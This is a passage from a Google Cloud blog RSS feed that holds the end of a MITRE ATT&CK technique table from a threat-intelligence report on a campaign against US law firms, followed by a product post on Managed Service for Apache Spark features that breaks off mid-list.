&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Initial Access&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1566.004&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Phishing: Spearphishing Voice&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1133&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;External Remote Services&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td rowspan="4" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Execution&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1204.002&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;User Execution: Malicious File&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1059.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Command and Scripting Interpreter: PowerShell&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1059.003&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Command and Scripting Interpreter: Windows Command Shell&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1569.002&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;System Services: Service Execution&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td rowspan="2" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Persistence&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1053.005&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Scheduled Task/Job: Scheduled Task&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1547.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Boot or Logon Autostart Execution: Registry Run Keys&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td rowspan="4" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Defense Evasion&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1036.005&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Masquerading: Match Legitimate Name or Location&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1553.002&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Subvert Trust Controls: Code Signing&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1562.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Impair Defenses: Disable or Modify Tools&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1070.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Indicator Removal: Clear Windows Event Logs&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td rowspan="2" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Credential Access&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1003.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;OS Credential Dumping: LSASS Memory&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1003.002&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;OS Credential Dumping: Security Account Manager&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td rowspan="3" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Discovery&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1083&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;File and Directory Discovery&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1135&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Network Share Discovery&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1046&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Network Service Discovery&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td rowspan="3" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Lateral Movement&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1219&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Remote Access Software&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1021.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Remote Services: Remote Desktop Protocol&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1021.004&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Remote Services: SSH&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Collection&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1005&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Data from Local System&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Command &amp;amp; Control&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1572&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Protocol Tunneling&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td rowspan="3" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Exfiltration&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1020&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Automated Exfiltration&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1567.002&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Exfiltration Over Web Service: Exfiltration to Cloud Storage&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1052.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Exfiltration Over Physical Medium&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Impact&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1486&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Data Encrypted for Impact&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;</description><pubDate>Fri, 05 Jun 2026 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/targeted-campaign-us-law-firms/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/targeted-campaign-us-law-firms/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Google Threat Intelligence Group </name><title></title><department></department><company></company></author></item><item><title>What's new for Managed Service for Apache Spark clusters</title><link>https://cloud.google.com/blog/products/data-analytics/enhancements-to-managed-service-for-apache-spark-clusters/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At Google Cloud, our goal is to let you run large-scale analytical and data science workloads with maximum efficiency so you can process big data pipelines, machine learning, and ETL tasks. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We recently announced that the Dataproc service is now &lt;/span&gt;&lt;a href="https://cloud.google.com/products/managed-service-for-apache-spark"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Managed Service for Apache Spark&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, reflecting our deep integration with the &lt;/span&gt;&lt;a href="https://cloud.google.com/data-cloud"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agentic Data Cloud&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To support the diverse architectural needs of today’s modern data teams, we offer the service in two distinct deployment modes: serverless and managed clusters. The serverless deployment mode completely abstracts infrastructure management for ephemeral or ad-hoc jobs, while the managed clusters deployment mode is designed for teams that require fine-grained infrastructure customization, persistent environments, long-running stateful processing, or native integration with custom Compute Engine hardware configurations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When it comes to managed cluster deployments, we’ve re-imagined the experience from the ground up, focusing on three core pillars: making Spark &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;faster&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; by supercharging execution speeds, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;easier&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; to run by maximizing resource obtainability and reducing operational overhead, and &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;smarter&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; by embedding AI directly into the development and operational lifecycle. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This blog post focuses specifically on what we announced at Google Cloud Next ‘26 for the Managed Spark clusters deployment mode: providing enhanced flexibility to fine-tune performance and cost through native execution engine, smarter scaling policies, and Gemini-powered extensions. For the latest of the serverless deployment mode, check out &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/serverless-managed-service-for-apache-spark-runtime-3-0-features?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;this blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Faster, with the Lightning Engine native execution engine&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Arguably the biggest update for Managed Spark clusters is &lt;/span&gt;&lt;a href="https://cloud.google.com/dataproc/docs/guides/lightning-engine"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Lightning Engine&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which introduces massive performance gains for Spark DataFrame/Dataset APIs and heavy Spark SQL queries. Powered by a native, C++ vectorized execution engine built on Velox and Gluten, with specialized internal enhancements, Lightning Engine bypasses JVM execution bottlenecks by compiling query plans into native instructions optimized for SIMD (Single Instruction, Multiple Data) vectorization.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This native execution engine delivers:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Up to 4.9x faster performance&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; than standard open-source Spark&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;up to 2x the price-performance &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;over the leading high-speed Spark alternative&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Crucially, taking advantage of these performance gains doesn’t require any code changes to your existing Spark applications. Because your jobs complete faster, you directly reduce your aggregate Compute Engine runtime hours and overall spend.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To enable Lightning Engine on your managed clusters, simply specify the Lightning Engine option when you’re creating a cluster.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee"
      href="https://youtube.com/watch?v=2uYC821jtEk"
      data-glue-modal-trigger="uni-modal-2uYC821jtEk-"
      data-glue-modal-disabled-on-mobile="true"&gt;

      
        

        &lt;div class="article-video__aspect-image"
          style="background-image: url(https://storage.googleapis.com/gweb-cloudblog-publish/images/maxresdefault_u5e7XRu.max-1000x1000.jpg);"&gt;
          &lt;span class="h-u-visually-hidden"&gt;The new way to use Spark: Intelligent, automated, and lightning fast&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg role="img" class="h-c-video__play h-c-icon h-c-icon--color-white"&gt;
        &lt;use xlink:href="#mi-youtube-icon"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
      &lt;figcaption class="article-video__caption h-c-page"&gt;
        
          &lt;h4 class="h-c-headline h-c-headline--four h-u-font-weight-medium h-u-mt-std"&gt;Learn technical details and hear Lowe’s experience with Lightning Engine&lt;/h4&gt;
        
        
      &lt;/figcaption&gt;
    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"
     data-glue-modal="uni-modal-2uYC821jtEk-"
     data-glue-modal-close-label="Close Dialog"&gt;
   &lt;a class="glue-yt-video"
      data-glue-yt-video-autoplay="true"
      data-glue-yt-video-height="99%"
      data-glue-yt-video-vid="2uYC821jtEk"
      data-glue-yt-video-width="100%"
      href="https://youtube.com/watch?v=2uYC821jtEk"
      ng-cloak&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Easier: Maximize resource obtainability via Flexible VMs&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Temporary localized shortages of a specific machine type can stall cluster creation or interrupt autoscaling. To dramatically improve cluster resilience against capacity constraints, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc/docs/concepts/configuring-clusters/flexible-vms"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Flexible VMs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for Managed Spark clusters are now generally available. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Flexible VMs allow you to define up to ten ranked machine types for your master, primary, and secondary worker nodes. Managed Service for Apache Spark pairs this preference with automated regional zone placement, dynamically scanning the entire region to fulfill your capacity requests using the best available hardware layout. This helps ensure your pipelines spin up predictably, drastically reducing resource availability errors, and maximizing your ability to capture cost-effective Spot VM capacity during periods of peak demand.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_vPfgVT7.max-1000x1000.jpg"
        
          alt="2"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Easier: Zero-scale clusters and scheduled stops&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To give you better fiscal control over persistent and developmental environments, we recently announced the general availability of two highly requested FinOps features: &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc/docs/guides/create-zero-scale-cluster"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;zero-scale clusters&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc/docs/concepts/configuring-clusters/scheduled-stop"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;cluster scheduled stops&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Zero-scale clusters&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: You can now provision environments that use exclusively secondary workers (Spot VMs), enabling the cluster to automatically scale down to absolutely zero worker nodes when no processing is active, leaving only the master node online to preserve metadata.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Cluster scheduled stops&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: This feature lets you configure automated cluster shutdown policies based on specific idle-time limits or a precise future timestamp.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Because these features are natively integrated, they reduce the operational friction of having to delete and reconstruct your environment, while you can stop paying for idle compute overhead during nights and weekends.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Smarter: Managed Service for Apache Spark MCP Server&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To bridge the gap between generative AI and data engineering, we launched the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc/docs/guides/use-dataproc-mcp"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Model Context Protocol (MCP) server for Managed Service for Apache Spark&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This open-standard integration allows LLMs and AI assistants to securely and dynamically interact with your Managed Spark clusters using natural language.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By utilizing the MCP server, your AI agents can securely connect to your data platform under existing IAM permissions. This allows agents to perform cluster-based operations, such as creating a cluster, submitting a job, or adjusting an autoscaling policy, directly from your AI application. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Smarter: Accelerating AI with the Data Agent Kit&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/data-cloud-extension"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Data Agent Kit&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; extension allows data scientists, engineers, and developers to manage their entire data workload lifecycle directly within their preferred development environment. We rolled out native support for this extension on Managed Spark clusters, enabling teams to seamlessly build and deploy specialized Data Agents for code generation and data wrangling.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/3_nOOSIdE.max-1000x1000.jpg"
        
          alt="3"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Developers can choose to use &lt;/span&gt;&lt;a href="https://antigravity.google/blog/introducing-google-antigravity-2-0" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Antigravity 2.0&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, Google's standalone, agentic development platform or bring these agentic capabilities into their preferred IDE including VS Code, Claude Code, or Codex via the Data Agent Kit extensions and plugins. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;By pairing this streamlined workflow with the raw processing power of managed clusters, these intelligent agents can securely execute complex workflows directly over petabyte-scale data lakes. Specifically, the Data Agent Kit enables developers to:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
